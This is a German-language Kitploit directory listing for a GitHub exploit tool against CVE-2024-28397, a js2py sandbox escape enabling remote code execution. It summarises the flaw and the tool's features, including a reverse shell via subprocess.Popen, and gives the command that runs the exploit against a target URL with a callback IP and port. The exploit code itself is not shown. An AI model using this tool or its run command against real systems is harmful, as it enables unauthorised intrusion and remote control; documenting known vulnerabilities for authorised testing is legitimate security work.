Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-28397-exploit — js2py <= 0.74 sandbox escape (CVE-2024-28397) | Kitploit
Tools/GitHubGitHub/3z-p0wn/cve-2024-28397-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHub3z-p0wn/cve-2024-28397-exploit

CVE-2024-28397-exploit

js2py <= 0.74 sandbox escape (CVE-2024-28397)

Repository anzeigen
vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

js2py Sandbox Escape (CVE-2024-28397)

Exploit zur Remote-Befehlsausführung (RCE) durch Sandbox-Escape in js2py <= 0.74.

Ermöglicht die Ausführung von beliebigem Code auf dem Zielsystem durch unsichere JavaScript-Auswertung.


Schwachstelle

  • CVE: CVE-2024-28397
  • Komponente: js2py
  • Betroffene Versionen: <= 0.74
  • Auswirkung: Remote Code Execution
  • Vektor: JavaScript-Sandbox-Escape
  • Schwachstellenanalyse: CVE-2024-28397-js2py-Sandbox-Escape

Eigenschaften

  • Sandbox-Escape
  • Befehlsausführung über subprocess.Popen
  • Reverse Shell
  • Keine externen Abhängigkeiten auf dem Ziel

Voraussetzungen

  • Python 3.8+
  • Zugriff auf einen verwundbaren Endpunkt, der JS mit js2py auswertet

Abhängigkeiten:

root@kitploit:~
pip install -r requirements.txt

Verwendung

root@kitploit:~
python3 exploit.py -U http://target_url -H IP -P PUERTO

Rechtlicher Hinweis

Dieses Projekt dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitsaudits.

Der Autor übernimmt keine Verantwortung für die missbräuchliche Verwendung dieses Tools.

Tool herunterladen